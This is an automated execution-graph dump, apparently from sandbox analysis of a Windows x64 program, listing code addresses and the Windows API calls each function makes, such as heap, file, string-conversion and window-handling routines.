      execution_graph 9836 140011b64 9843 140011ab8 LoadLibraryW 9836->9843 9838 140011b96 RtlEnterCriticalSection 9839 140011bb8 RtlLeaveCriticalSection 9838->9839 9840 140011ba9 9838->9840 9850 140011370 RtlAllocateHeap RtlAllocateHeap RtlInitializeCriticalSection 9840->9850 9842 140011bb5 9842->9839 9844 140011aeb GetProcAddress 9843->9844 9847 140011b24 9843->9847 9845 140011b17 FreeLibrary 9844->9845 9846 140011b00 9844->9846 9845->9847 9848 140011b44 9845->9848 9846->9845 9847->9848 9849 140011b38 Sleep 9847->9849 9848->9838 9849->9847 9850->9842 9683 1400138e5 9686 14001364c 9683->9686 9684 140015060 3 API calls 9685 14001449c 9684->9685 9686->9683 9686->9684 9686->9685 9021 140001dea 9022 140001ded 9021->9022 9033 140012360 9022->9033 9025 140012360 HeapFree 9026 140001e11 9025->9026 9027 140012360 HeapFree 9026->9027 9028 140001e23 9027->9028 9029 140012360 HeapFree 9028->9029 9030 140001e35 9029->9030 9031 140012360 HeapFree 9030->9031 9032 140001e47 9031->9032 9034 140012371 HeapFree 9033->9034 9035 140001dfc 9033->9035 9034->9035 9035->9025 9851 140011f69 9852 14001202d 9851->9852 9853 140011f89 9851->9853 9853->9852 9854 140011fc4 9853->9854 9855 140011d30 4 API calls 9853->9855 9856 140011feb 9854->9856 9857 140011fcf memcpy 9854->9857 9855->9854 9856->9852 9858 140011ffb 9856->9858 9859 14001202f memcpy 9856->9859 9857->9856 9858->9852 9860 140016828 5 API calls 9858->9860 9859->9852 9860->9858 9861 140016f6c 9862 140016f79 TlsFree 9861->9862 9863 140016faf 9861->9863 9864 140016f87 9862->9864 9865 140016f9b RtlDeleteCriticalSection 9864->9865 9866 140016eb8 6 API calls 9864->9866 9865->9863 9866->9864 9687 1400016ed 9688 1400016f0 9687->9688 9689 140012360 HeapFree 9688->9689 9690 1400016ff 9689->9690 9691 140011ef4 2 API calls 9690->9691 9692 140001711 9691->9692 9693 140011ef4 2 API calls 9692->9693 9694 140001723 9693->9694 9378 140003c6e 9379 140003c71 9378->9379 9380 140012360 HeapFree 9379->9380 9381 140003c80 9380->9381 9382 140012360 HeapFree 9381->9382 9383 140003c92 9382->9383 9384 140012360 HeapFree 9383->9384 9385 140003ca7 9384->9385 9386 140012360 HeapFree 9385->9386 9387 140003cb9 9386->9387 9388 140010c70 9391 140010c98 9388->9391 9389 140010cd9 9410 140010f00 9389->9410 9391->9389 9393 140010cd1 9391->9393 9394 140010ceb 9391->9394 9397 1400174e0 9393->9397 9394->9389 9404 140017140 9394->9404 9398 140017506 WideCharToMultiByte 9397->9398 9399 14001758d malloc 9397->9399 9398->9399 9402 14001754a malloc 9398->9402 9400 14001759a 9399->9400 9400->9389 9402->9399 9403 14001755d WideCharToMultiByte 9402->9403 9403->9400 9405 140017166 WideCharToMultiByte 9404->9405 9408 1400171f2 9404->9408 9407 1400171ae malloc 9405->9407 9405->9408 9407->9408 9409 1400171bf WideCharToMultiByte 9407->9409 9408->9389 9409->9408 9411 140010f1e 9410->9411 9412 1400126d0 3 API calls 9411->9412 9413 140010d5b 9412->9413 8863 14000e3f0 8864 14000e4ee 8863->8864 8865 14000e40a 8863->8865 8865->8864 8866 14000e483 8865->8866 8867 14000e41a 8865->8867 8880 14000e770 WideCharToMultiByte 8866->8880 8868 14000e451 8867->8868 8869 14000e425 8867->8869 8868->8868 8871 14000e45d WriteFile 8868->8871 8873 14000e620 5 API calls 8869->8873 8877 14000e445 8873->8877 8874 14000e4c5 WriteFile 8876 14000e4dc HeapFree 8874->8876 8875 14000e4b7 8884 14000e620 8875->8884 8876->8864 8879 14000e4bf 8879->8876 8881 14000e7b9 RtlAllocateHeap 8880->8881 8882 14000e4a0 8880->8882 8881->8882 8883 14000e7d8 WideCharToMultiByte 8881->8883 8882->8864 8882->8874 8882->8875 8883->8882 8885 14000e644 8884->8885 8886 14000e75e 8884->8886 8887 14000e673 8885->8887 8888 14000e64a SetFilePointer 8885->8888 8886->8879 8889 14000e67e 8887->8889 8890 14000e6ff 8887->8890 8888->8887 8892 14000e6b7 8889->8892 8896 14000e699 memcpy 8889->8896 8897 14000ddc0 8890->8897 8892->8879 8893 14000e707 8894 14000e711 WriteFile 8893->8894 8895 14000e739 memcpy 8893->8895 8894->8879 8895->8879 8896->8879 8898 14000de04 8897->8898 8899 14000ddd4 WriteFile 8897->8899 8898->8893 8899->8893 9036 14000e1f0 9037 1400112a8 5 API calls 9036->9037 9038 14000e21b 9037->9038 9039 14000e227 CreateFileW 9038->9039 9040 14000e2c8 9038->9040 9041 14000e27f 9039->9041 9042 14000e25c 9039->9042 9041->9040 9044 1400111dc 4 API calls 9041->9044 9042->9041 9043 14000e267 RtlAllocateHeap 9042->9043 9043->9041 9044->9040 9414 140014673 9415 140014682 9414->9415 9417 1400146ba 9414->9417 9416 140014747 9417->9416 9418 1400148e1 memcpy 9417->9418 9418->9416 9867 140013175 9870 14001317a 9867->9870 9868 140015060 3 API calls 9869 14001449c 9868->9869 9871 14001340c memcpy 9870->9871 9872 1400130c8 9870->9872 9871->9872 9872->9868 9872->9869 9049 1400113f8 RtlEnterCriticalSection 9050 140011423 RtlLeaveCriticalSection 9049->9050 9695 14000d8f8 9696 14000d908 9695->9696 9697 14000d90d 9695->9697 9699 140011a50 9696->9699 9700 140011a81 9699->9700 9701 140011a60 9699->9701 9700->9697 9705 140011c48 RtlEnterCriticalSection 9701->9705 9703 140011a65 9703->9700 9706 140011bdc 9703->9706 9705->9703 9707 140011be7 9706->9707 9708 140011c3c 9707->9708 9709 140011c32 RtlLeaveCriticalSection 9707->9709 9708->9703 9709->9708 8859 140010ffc 8860 140011009 8859->8860 8861 14001101f 8859->8861 8860->8861 8862 140011013 TlsFree 8860->8862 8862->8861 9873 140010b7c 9874 140010b85 memset 9873->9874 9875 140010b8d 9873->9875 9874->9875 9876 14000477e 9877 140012360 HeapFree 9876->9877 9878 140004790 9877->9878 9879 140012360 HeapFree 9878->9879 9880 1400047a2 9879->9880 9881 140012360 HeapFree 9880->9881 9882 1400047b4 9881->9882 9883 140012360 HeapFree 9882->9883 9884 1400047c6 9883->9884 9885 140012360 HeapFree 9884->9885 9886 1400047d8 9885->9886 9710 140016700 malloc 8900 140001000 8901 14000101d 8900->8901 8952 140012060 HeapCreate TlsAlloc 8901->8952 8903 14000105b 8955 14000de20 8903->8955 8905 140001065 8958 14000c980 HeapCreate 8905->8958 8907 140001074 8959 14000c07c 8907->8959 8909 140001079 8910 14000b538 memset 00007FFB1B7A5550 CoInitialize 8909->8910 8911 14000107e 8910->8911 8912 140007160 RtlInitializeCriticalSection 8911->8912 8913 140001083 8912->8913 8914 1400120d0 RtlAllocateHeap RtlReAllocateHeap HeapFree 8913->8914 8915 1400010a3 8914->8915 8916 14000ccd8 32 API calls 8915->8916 8917 1400010e6 8916->8917 8918 14000d524 16 API calls 8917->8918 8919 1400010fa 8918->8919 8920 14000d444 11 API calls 8919->8920 8921 14000111e 8920->8921 8922 14000d524 16 API calls 8921->8922 8923 14000112a 8922->8923 8924 14000d444 11 API calls 8923->8924 8925 14000114e 8924->8925 8926 140011d30 RtlAllocateHeap memset HeapFree HeapFree 8925->8926 8927 140001185 8926->8927 8928 1400120d0 RtlAllocateHeap RtlReAllocateHeap HeapFree 8927->8928 8929 1400011a6 8928->8929 8930 14000d524 16 API calls 8929->8930 8931 1400011b2 8930->8931 8932 14000d444 11 API calls 8931->8932 8933 1400011d6 8932->8933 8934 14000c4d0 RtlRemoveVectoredExceptionHandler RtlAddVectoredExceptionHandler 8933->8934 8935 1400011e5 8934->8935 8936 1400121c0 GetLastError TlsGetValue SetLastError 8935->8936 8937 1400011ef 8936->8937 8938 1400121c0 GetLastError TlsGetValue SetLastError 8937->8938 8939 1400011ff 8938->8939 8940 140004211 32 API calls 8939->8940 8941 14000120e 8940->8941 8942 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8941->8942 8943 14000121f 8942->8943 8944 1400021ea 51 API calls 8943->8944 8945 140001224 8944->8945 8946 140001236 8945->8946 8947 14000433f 191 API calls 8945->8947 8948 14000593c 235 API calls 8946->8948 8947->8946 8949 14000123b 8948->8949 8950 1400120a0 HeapDestroy TlsFree 8949->8950 8951 140001245 HeapDestroy ExitProcess 8950->8951 8964 140012c50 RtlAllocateHeap RtlAllocateHeap TlsSetValue 8952->8964 8954 14001208c 8954->8903 8965 140011370 RtlAllocateHeap RtlAllocateHeap RtlInitializeCriticalSection 8955->8965 8957 14000de38 8957->8905 8958->8907 8966 1400110dc 8959->8966 8963 14000c0a8 RtlInitializeCriticalSection 8964->8954 8965->8957 8967 1400110fd 8966->8967 8968 140011112 TlsAlloc RtlAllocateHeap TlsSetValue 8967->8968 8969 140011149 TlsGetValue RtlReAllocateHeap TlsSetValue 8967->8969 8968->8969 8970 140011198 8969->8970 8971 14000c08d 8970->8971 8974 140011cb0 RtlAllocateHeap 8970->8974 8973 140011370 RtlAllocateHeap RtlAllocateHeap RtlInitializeCriticalSection 8971->8973 8973->8963 8975 140011cd3 8974->8975 8975->8971 9052 140007a00 9055 140007a50 9052->9055 9056 140007a79 9055->9056 9077 140012630 TlsGetValue 9056->9077 9059 140012630 TlsGetValue 9060 140007a9c 9059->9060 9079 1400126d0 TlsGetValue 9060->9079 9064 140007abf 9069 140007acf 9064->9069 9086 140012850 TlsGetValue 9064->9086 9065 140007c35 9087 140012900 TlsGetValue 9065->9087 9068 140007a1c 9069->9065 9070 140007b20 RtlAllocateHeap 9069->9070 9071 140007b50 9069->9071 9070->9071 9071->9071 9072 140007b91 wcsncpy 9071->9072 9075 140007bac 9071->9075 9072->9075 9073 140007c02 9073->9065 9074 140007c09 HeapFree 9073->9074 9074->9065 9075->9073 9076 140007bdf wcsncpy 9075->9076 9076->9073 9078 140007a92 9077->9078 9078->9059 9080 1400126f4 9079->9080 9081 140012772 9080->9081 9082 14001272d RtlReAllocateHeap 9080->9082 9083 140007ab1 9081->9083 9084 140012793 RtlReAllocateHeap 9081->9084 9082->9083 9083->9064 9085 140012850 TlsGetValue 9083->9085 9084->9083 9085->9064 9086->9069 9087->9068 9088 140008200 9091 140008260 9088->9091 9092 1400082e4 9091->9092 9093 140008397 9092->9093 9104 14000830a 9092->9104 9094 140012630 TlsGetValue 9093->9094 9096 14000839f 9094->9096 9095 140008221 9097 1400083ba 9096->9097 9098 1400083aa _wcsdup 9096->9098 9099 140012630 TlsGetValue 9097->9099 9098->9097 9100 1400083c2 9099->9100 9101 1400083d8 9100->9101 9102 1400083cd _wcsdup 9100->9102 9103 140012630 TlsGetValue 9101->9103 9102->9101 9105 1400083e0 9103->9105 9104->9095 9106 140008363 wcsncpy 9104->9106 9107 1400083eb _wcsdup 9105->9107 9110 1400083f8 9105->9110 9106->9104 9107->9110 9108 1400126d0 3 API calls 9109 140008481 9108->9109 9111 1400084ed wcsncpy 9109->9111 9112 140008488 9109->9112 9113 14000850e 9109->9113 9110->9108 9111->9113 9114 140008575 9112->9114 9115 14000856d free 9112->9115 9113->9112 9119 1400085c0 wcsncpy 9113->9119 9116 140008587 9114->9116 9117 14000857f free 9114->9117 9115->9114 9116->9095 9118 140008591 free 9116->9118 9117->9116 9118->9095 9119->9113 9425 14000d881 9426 14000d89d 9425->9426 9427 14000d8dc 9425->9427 9426->9427 9431 14000d8af 9426->9431 9432 14000d60c 9426->9432 9431->9427 9439 14000d6a0 9431->9439 9444 140016828 9431->9444 9433 14000d656 9432->9433 9437 14000d62f 9432->9437 9434 14000d654 9433->9434 9435 1400116f4 3 API calls 9433->9435 9434->9431 9435->9433 9436 140016bb0 HeapFree 9436->9437 9437->9434 9437->9436 9453 1400116f4 9437->9453 9440 14001147c 4 API calls 9439->9440 9441 14000d6b6 9440->9441 9442 14000d6c2 memset 9441->9442 9443 14000d6d6 9441->9443 9442->9443 9443->9431 9445 140016ba7 9444->9445 9451 140016831 9444->9451 9445->9431 9446 140016b85 9446->9445 9447 140016ba2 memcpy 9446->9447 9447->9445 9448 140016b50 memcpy 9448->9451 9449 140016828 wcslen RtlAllocateHeap HeapFree 9449->9451 9450 140012360 HeapFree 9450->9451 9451->9446 9451->9448 9451->9449 9451->9450 9460 1400122f0 9451->9460 9454 14001170a RtlEnterCriticalSection 9453->9454 9458 140011714 9453->9458 9454->9458 9455 1400117f1 9455->9437 9456 1400117e7 RtlLeaveCriticalSection 9456->9455 9457 140011794 9457->9455 9457->9456 9458->9457 9459 14001177b HeapFree 9458->9459 9459->9457 9461 140012351 9460->9461 9462 140012306 wcslen RtlAllocateHeap 9460->9462 9461->9451 9462->9461 9120 140013801 9121 140013810 9120->9121 9122 1400144ee 9121->9122 9123 14001389e memcpy 9121->9123 9125 1400138d8 9121->9125 9122->9125 9126 140015060 9122->9126 9123->9125 9127 14001508d 9126->9127 9128 1400150ea memcpy 9127->9128 9129 1400150cf memcpy 9127->9129 9131 1400150a7 9127->9131 9130 14001510b memcpy 9128->9130 9128->9131 9129->9131 9130->9131 9131->9125 9132 14000bc0c 9133 14000bc19 EnableWindow 9132->9133 9134 14000bc2b 9132->9134 9133->9134 9135 140017410 9136 14001749e malloc 9135->9136 9137 140017430 MultiByteToWideChar 9135->9137 9138 1400174ac 9136->9138 9137->9136 9140 14001745d malloc MultiByteToWideChar 9137->9140 9140->9138 9719 140014d10 9720 140014d32 9719->9720 9722 140014d6a 9719->9722 9721 140015060 3 API calls 9720->9721 9720->9722 9721->9722 9723 140016710 free 9887 140014990 9888 1400149aa 9887->9888 9889 140014a09 9887->9889 9888->9889 9890 1400149df memcpy memcpy 9888->9890 9890->9889 9891 140012390 HeapFree HeapFree 9463 14000c490 9468 14000c6e0 9463->9468 9466 14000c4c6 9467 14000c4ab GetCurrentProcess TerminateProcess 9467->9466 9471 14000c4f0 9468->9471 9472 14000c510 9471->9472 9472->9472 9473 14000c562 RtlLookupFunctionEntry 9472->9473 9474 14000c5b4 RtlLookupFunctionEntry 9473->9474 9475 14000c5f3 9473->9475 9474->9475 9477 14000c499 9474->9477 9476 14000c61b RtlVirtualUnwind 9475->9476 9475->9477 9478 14000c664 RtlLookupFunctionEntry 9475->9478 9476->9475 9476->9477 9477->9466 9477->9467 9478->9475 9478->9477 9724 140007110 RtlEnterCriticalSection 9725 140007141 9724->9725 9726 140007125 CloseHandle 9725->9726 9727 14000714d RtlLeaveCriticalSection 9725->9727 9728 140011c68 HeapFree 9726->9728 9728->9725 9141 140011e11 9144 140011e56 9141->9144 9143 140011ec4 9144->9143 9144->9144 9145 140011d30 9144->9145 9151 140011ef4 9145->9151 9148 140011dc6 9148->9143 9149 140011d6e RtlAllocateHeap 9149->9148 9150 140011d90 memset 9149->9150 9150->9148 9152 140011d69 9151->9152 9153 140011ef9 9151->9153 9152->9148 9152->9149 9154 140011f38 HeapFree 9153->9154 9156 140016bb0 9153->9156 9154->9152 9159 140016bca 9156->9159 9157 140016ced 9157->9153 9158 140016bb0 HeapFree 9158->9159 9159->9157 9159->9158 9160 140012360 HeapFree 9159->9160 9160->9159 9729 140002914 9730 140012360 HeapFree 9729->9730 9731 140002926 9730->9731 9732 14001711c 9733 140017124 9732->9733 9734 140017129 9732->9734 9736 140016eb8 UnregisterWait CloseHandle RtlEnterCriticalSection 9733->9736 9738 140016ef7 RtlLeaveCriticalSection 9736->9738 9739 140016f26 9738->9739 9740 140016f4a HeapFree 9739->9740 9741 140016f33 HeapFree 9739->9741 9742 14001f820 9740->9742 9741->9739 9161 14000281c 9168 140012600 TlsGetValue 9161->9168 9163 140002821 9164 140012360 HeapFree 9163->9164 9165 140002835 9164->9165 9166 140012360 HeapFree 9165->9166 9167 140002847 9166->9167 9168->9163 9743 14001431b 9744 1400144ee 9743->9744 9746 140014324 9743->9746 9745 140015060 3 API calls 9744->9745 9744->9746 9745->9746 9169 140017220 9170 140017250 9169->9170 9170->9170 9171 14001725b MultiByteToWideChar 9170->9171 9172 1400126d0 3 API calls 9171->9172 9173 140017287 MultiByteToWideChar 9172->9173 9479 1400076a0 9480 1400076b4 9479->9480 9482 140007716 9479->9482 9481 140007702 wcsstr 9480->9481 9480->9482 9481->9482 9483 14000bea0 GetWindowThreadProcessId GetCurrentThreadId 9484 14000bf31 9483->9484 9485 14000bec1 IsWindowVisible 9483->9485 9485->9484 9486 14000bece 9485->9486 9487 140011cb0 RtlAllocateHeap 9486->9487 9488 14000bedf GetCurrentThreadId GetWindowLongPtrW 9487->9488 9489 14000bf06 9488->9489 9490 14000bf0a GetForegroundWindow 9488->9490 9489->9490 9490->9484 9491 14000bf15 IsWindowEnabled 9490->9491 9491->9484 9492 14000bf22 EnableWindow 9491->9492 9492->9484 9493 1400034a2 9506 140012600 TlsGetValue 9493->9506 9495 1400034a7 9496 140012360 HeapFree 9495->9496 9497 1400034bb 9496->9497 9498 140012360 HeapFree 9497->9498 9499 1400034cd 9498->9499 9500 140012360 HeapFree 9499->9500 9501 1400034df 9500->9501 9502 140012360 HeapFree 9501->9502 9503 1400034f1 9502->9503 9504 140012360 HeapFree 9503->9504 9505 140003503 9504->9505 9506->9495 9174 140011024 9175 140011032 TlsFree 9174->9175 9176 14001103e 9174->9176 9175->9176 9177 14000e824 9178 14000e8e4 9177->9178 9186 14000fee4 9178->9186 9187 14000ff0b 9186->9187 9188 14000ff92 9187->9188 9189 14000ff47 memcpy 9187->9189 9193 14000ea48 9189->9193 9191 14000ff70 9191->9188 9192 14000ea48 memcpy 9191->9192 9192->9191 9194 14000ea81 9193->9194 9195 14000ea71 memcpy 9193->9195 9194->9191 9195->9194 9906 140010fa8 9907 140010fbe 9906->9907 9908 140010fdd HeapFree 9907->9908 9909 140010fef 9907->9909 9908->9909 9196 140013227 9199 14001322c 9196->9199 9197 140015060 3 API calls 9198 14001449c 9197->9198 9200 14001340c memcpy 9199->9200 9201 14001341c 9199->9201 9200->9201 9201->9197 9201->9198 9910 1400021a8 9911 1400021ab 9910->9911 9912 140012360 HeapFree 9911->9912 9913 1400021ba 9912->9913 9914 140012360 HeapFree 9913->9914 9915 1400021cc 9914->9915 9916 140012360 HeapFree 9915->9916 9917 1400021de 9916->9917 9202 14001162c 9207 14001147c 9202->9207 9205 140011646 memset 9206 140011659 9205->9206 9208 1400114a4 9207->9208 9209 14001149a RtlEnterCriticalSection 9207->9209 9210 14001155e RtlAllocateHeap 9208->9210 9212 1400114b1 9208->9212 9209->9208 9211 140011586 RtlAllocateHeap 9210->9211 9210->9212 9211->9212 9213 140011606 9212->9213 9214 1400115fc RtlLeaveCriticalSection 9212->9214 9213->9205 9213->9206 9214->9213 9215 14000b62c 9216 14000b635 HeapFree 9215->9216 9217 14000b647 9215->9217 9216->9217 9516 1400040ac 9517 1400123e0 21 API calls 9516->9517 9518 1400040ce 9517->9518 9519 14000d6a0 5 API calls 9518->9519 9520 1400040da 9519->9520 9529 1400121c0 GetLastError TlsGetValue SetLastError 9520->9529 9522 1400040e4 9530 1400121c0 GetLastError TlsGetValue SetLastError 9522->9530 9524 1400040f8 9531 14000ca00 9524->9531 9528 140004122 9529->9522 9530->9524 9532 14000ca20 9531->9532 9533 1400126d0 3 API calls 9532->9533 9534 14000ca34 9533->9534 9535 14000ca3b memcpy 9534->9535 9536 14000410d 9534->9536 9535->9536 9537 140012210 TlsGetValue 9536->9537 9538 140012251 RtlAllocateHeap 9537->9538 9539 140012276 RtlReAllocateHeap 9537->9539 9540 1400122a1 9538->9540 9539->9540 9540->9528 9747 14000432e 9750 140012600 TlsGetValue 9747->9750 9749 140004333 9750->9749 9218 140011a30 RtlInitializeCriticalSection 9016 14000c6b0 9017 14000c6d1 9016->9017 9018 14000c6c0 RtlRemoveVectoredExceptionHandler 9016->9018 9018->9017 9219 140007a30 9220 140007a50 10 API calls 9219->9220 9221 140007a49 9220->9221 9222 140008230 9223 140008260 13 API calls 9222->9223 9224 140008251 9223->9224 9751 140007730 9752 1400077e3 9751->9752 9753 140007743 9751->9753 9753->9752 9754 1400077b5 9753->9754 9755 1400077bc wcsstr 9753->9755 9758 1400085f0 9754->9758 9757 1400077ba 9755->9757 9759 140008617 CharLowerW 9758->9759 9760 14000869f 9758->9760 9763 140008630 9759->9763 9760->9757 9761 14000864c CharLowerW 9761->9763 9762 140008670 CharLowerW CharLowerW 9762->9763 9763->9760 9763->9761 9763->9762 9547 140008eb5 9548 140008ee3 9547->9548 9549 140008ec9 9547->9549 9552 140008ed4 9548->9552 9563 14000afc0 9548->9563 9549->9552 9553 140009da0 9549->9553 9554 140009dc9 9553->9554 9556 140009e0d 9553->9556 9573 14000b510 9554->9573 9556->9556 9557 140009da0 _wcsicmp 9556->9557 9558 140009de0 9556->9558 9559 140009e66 9557->9559 9558->9552 9560 140009da0 _wcsicmp 9559->9560 9562 140009e79 9560->9562 9561 14000b510 _wcsicmp 9561->9562 9562->9558 9562->9561 9564 14000afe9 9563->9564 9567 14000b02d 9563->9567 9565 14000b510 _wcsicmp 9564->9565 9566 14000b000 9565->9566 9566->9552 9567->9566 9567->9567 9568 14000afc0 _wcsicmp 9567->9568 9569 14000b086 9568->9569 9570 14000afc0 _wcsicmp 9569->9570 9571 14000b099 9570->9571 9571->9566 9572 14000b510 _wcsicmp 9571->9572 9572->9571 9574 14000b515 9573->9574 9577 14000b524 9573->9577 9575 1400070cc _wcsicmp 9574->9575 9576 14000b51e 9574->9576 9575->9558 9575->9573 9576->9558 9577->9558 8852 140016eb8 UnregisterWait CloseHandle RtlEnterCriticalSection 8854 140016ef7 RtlLeaveCriticalSection 8852->8854 8855 140016f26 8854->8855 8856 140016f4a HeapFree 8855->8856 8857 140016f33 HeapFree 8855->8857 8858 14001f820 8856->8858 8857->8855 9225 14000bc38 9226 14000bc84 9225->9226 9227 14000bc4c 9225->9227 9227->9226 9228 14000bc51 SendMessageW Sleep PostMessageW 9227->9228 9228->9226 9578 1400146b7 9579 1400146d7 9578->9579 9581 140014747 9578->9581 9580 1400148e1 memcpy 9579->9580 9579->9581 9580->9581 9233 14000e83b RtlAllocateHeap 9234 14000e87d 9233->9234 9235 14000303f 9246 140012600 TlsGetValue 9235->9246 9237 140003044 9238 140012360 HeapFree 9237->9238 9239 140003058 9238->9239 9240 140012360 HeapFree 9239->9240 9241 14000306a 9240->9241 9242 140012360 HeapFree 9241->9242 9243 14000307c 9242->9243 9244 140012360 HeapFree 9243->9244 9245 14000308e 9244->9245 9246->9237 9582 1400172c0 9583 1400172f0 9582->9583 9583->9583 9584 1400172fb MultiByteToWideChar malloc MultiByteToWideChar 9583->9584 9247 14000c040 9253 140011248 RtlEnterCriticalSection 9247->9253 9250 14000c075 9251 14000c05d CloseHandle 9252 1400111dc 4 API calls 9251->9252 9252->9250 9254 14001127a RtlLeaveCriticalSection 9253->9254 9255 14001126c 9253->9255 9256 14000c058 9254->9256 9255->9254 9256->9250 9256->9251 9585 1400048c0 9594 140012600 TlsGetValue 9585->9594 9587 1400048c5 9588 140012360 HeapFree 9587->9588 9589 1400048d9 9588->9589 9590 140012360 HeapFree 9589->9590 9591 1400048eb 9590->9591 9592 140012360 HeapFree 9591->9592 9593 1400048fd 9592->9593 9594->9587 9764 14000e540 9765 140011248 2 API calls 9764->9765 9766 14000e55f 9765->9766 9767 14000b740 9770 14000b758 9767->9770 9810 14000b5d8 9770->9810 9772 14000b790 9773 14000b5d8 2 API calls 9772->9773 9774 14000b79b 9773->9774 9775 14000b5d8 2 API calls 9774->9775 9776 14000b7a6 9775->9776 9777 14000b7b2 GetStockObject 9776->9777 9778 14000b7c3 LoadIconW LoadCursorW RegisterClassExW 9776->9778 9777->9778 9779 14000be5c 3 API calls 9778->9779 9780 14000b83f 9779->9780 9781 14000bf44 7 API calls 9780->9781 9782 14000b84d 9781->9782 9783 14000b859 IsWindowEnabled 9782->9783 9784 14000b87a 9782->9784 9783->9784 9785 14000b863 EnableWindow 9783->9785 9786 14000be5c 3 API calls 9784->9786 9785->9784 9787 14000b886 GetSystemMetrics GetSystemMetrics CreateWindowExW 9786->9787 9788 14000b902 6 API calls 9787->9788 9789 14000bb96 9787->9789 9791 14000ba12 SendMessageW wcslen wcslen SendMessageW 9788->9791 9792 14000ba53 CreateWindowExW SendMessageW CreateAcceleratorTableW SetForegroundWindow BringWindowToTop 9788->9792 9790 14000bba4 9789->9790 9813 140012810 TlsGetValue 9789->9813 9794 14000bba9 HeapFree 9790->9794 9795 14000bbbb 9790->9795 9791->9792 9796 14000bb48 9792->9796 9794->9795 9797 14000bbd2 9795->9797 9798 14000bbc0 HeapFree 9795->9798 9799 14000bb51 9796->9799 9800 14000bb0a GetMessageW 9796->9800 9802 14000bbd7 HeapFree 9797->9802 9803 14000b751 9797->9803 9798->9797 9804 14000bb56 DestroyAcceleratorTable 9799->9804 9805 14000bb5f 9799->9805 9800->9799 9801 14000bb20 TranslateAcceleratorW 9800->9801 9801->9796 9807 14000bb34 TranslateMessage DispatchMessageW 9801->9807 9802->9803 9804->9805 9805->9789 9806 14000bb68 wcslen 9805->9806 9808 1400126d0 3 API calls 9806->9808 9807->9796 9809 14000bb77 wcscpy HeapFree 9808->9809 9809->9789 9811 14000b5ea wcslen RtlAllocateHeap 9810->9811 9812 14000b60e 9810->9812 9811->9812 9812->9772 9813->9790 9257 14000c444 9258 14000c455 9257->9258 9259 14000c44d SetEnvironmentVariableW 9257->9259 9259->9258 9595 14000cec4 9596 14000cf4b 9595->9596 9597 14000cee9 9595->9597 9597->9596 9599 14000cf02 9597->9599 9603 14000d140 9597->9603 9599->9596 9602 140016828 5 API calls 9599->9602 9610 14000d1f0 9599->9610 9619 14000d02c 9599->9619 9602->9599 9607 14000d15b 9603->9607 9604 14000d1b4 memset 9605 14000d1d0 9604->9605 9605->9599 9606 14000d163 HeapFree 9606->9607 9607->9604 9607->9606 9608 140016bb0 HeapFree 9607->9608 9609 1400116f4 3 API calls 9607->9609 9608->9607 9609->9607 9611 14000d230 9610->9611 9612 14000d210 9610->9612 9613 14001147c 4 API calls 9611->9613 9612->9611 9614 14000d21d 9612->9614 9618 14000d22e 9613->9618 9616 140016bb0 HeapFree 9614->9616 9614->9618 9615 14000d295 9615->9599 9616->9618 9617 14000d281 memset 9617->9615 9618->9615 9618->9617 9620 14000d04c 9619->9620 9622 14000d073 9619->9622 9634 14000cf74 9620->9634 9625 14000d08f 9622->9625 9640 14000d3a4 9622->9640 9624 14000d051 9624->9622 9626 14000d059 9624->9626 9627 14001147c 4 API calls 9625->9627 9628 14000d06e 9626->9628 9632 140016bb0 HeapFree 9626->9632 9629 14000d0a6 9627->9629 9630 14000d11c 9628->9630 9631 14000d108 memset 9628->9631 9629->9630 9633 14000d0ae wcslen RtlAllocateHeap wcscpy 9629->9633 9630->9599 9631->9630 9632->9628 9633->9628 9635 14000cfe2 9634->9635 9636 14000cfa2 9634->9636 9638 14000cfa7 9635->9638 9639 14000cff8 wcscmp 9635->9639 9637 14000d3a4 tolower 9636->9637 9637->9638 9638->9624 9639->9635 9639->9638 9641 14000d3c7 tolower 9640->9641 9642 14000d3b8 9641->9642 9643 14000d3d0 9641->9643 9642->9641 9643->9625 9814 140003144 9815 140003147 9814->9815 9816 140012360 HeapFree 9815->9816 9817 140003156 9816->9817 9818 140012360 HeapFree 9817->9818 9819 140003168 9818->9819 9260 140002648 9261 14000264f 9260->9261 9262 140012360 HeapFree 9261->9262 9263 140002666 9262->9263 9264 140012360 HeapFree 9263->9264 9265 140002678 9264->9265 9266 140012360 HeapFree 9265->9266 9267 14000268a 9266->9267 9268 140012360 HeapFree 9267->9268 9269 14000269c 9268->9269 9270 140012360 HeapFree 9269->9270 9271 1400026ae 9270->9271 9644 1400088c9 9645 1400088fa 9644->9645 9646 1400088e0 9644->9646 9648 14000afc0 _wcsicmp 9645->9648 9649 1400088eb 9645->9649 9647 140009da0 _wcsicmp 9646->9647 9646->9649 9647->9649 9648->9649 9272 14000b64c 9273 14000b667 9272->9273 9274 14000b70e UnregisterClassW 9272->9274 9276 14000b674 NtdllDefWindowProc_W 9273->9276 9277 14000b67f 9273->9277 9281 14000b68b 9273->9281 9275 14000b72c 9274->9275 9276->9275 9280 14000b695 GetWindowLongPtrW GetWindowTextLengthW RtlAllocateHeap GetWindowTextW 9277->9280 9277->9281 9278 14000b6ea EnableWindow 9279 14000b6fc 9278->9279 9284 14000bf44 9279->9284 9280->9281 9281->9275 9281->9278 9281->9279 9285 14000bf57 EnumWindows 9284->9285 9286 14000bfbb 9284->9286 9287 14000bf77 GetCurrentThreadId 9285->9287 9288 14000b703 DestroyWindow 9285->9288 9286->9288 9289 14000bfc7 GetCurrentThreadId 9286->9289 9292 14000bfdb EnableWindow 9286->9292 9293 14000bff0 SetWindowPos 9286->9293 9294 140011c68 HeapFree 9286->9294 9290 14000bf85 9287->9290 9288->9275 9289->9286 9290->9287 9290->9288 9291 14000bf8b SetWindowPos 9290->9291 9291->9290 9292->9286 9293->9286 9294->9286 9824 140002b4c 9825 1400123e0 21 API calls 9824->9825 9826 140002b6a 9825->9826 9650 140012cd0 TlsGetValue HeapFree HeapFree 8976 14000de50 8996 1400112a8 RtlEnterCriticalSection 8976->8996 8978 14000de98 8979 14000deb6 8978->8979 8980 14000defb 8978->8980 8993 14000e074 8978->8993 8981 14000dec9 8979->8981 8982 14000decd CreateFileW 8979->8982 8983 14000df00 8980->8983 8986 14000df42 8980->8986 8981->8982 8989 14000dfb7 8982->8989 8984 14000df13 8983->8984 8985 14000df17 CreateFileW 8983->8985 8984->8985 8985->8989 8988 14000df5f CreateFileW 8986->8988 8986->8989 8987 14000e04d 8987->8993 9005 1400111dc RtlEnterCriticalSection 8987->9005 8988->8989 8991 14000df8d CreateFileW 8988->8991 8989->8987 8992 14000dff9 8989->8992 8994 14000dfe1 RtlAllocateHeap 8989->8994 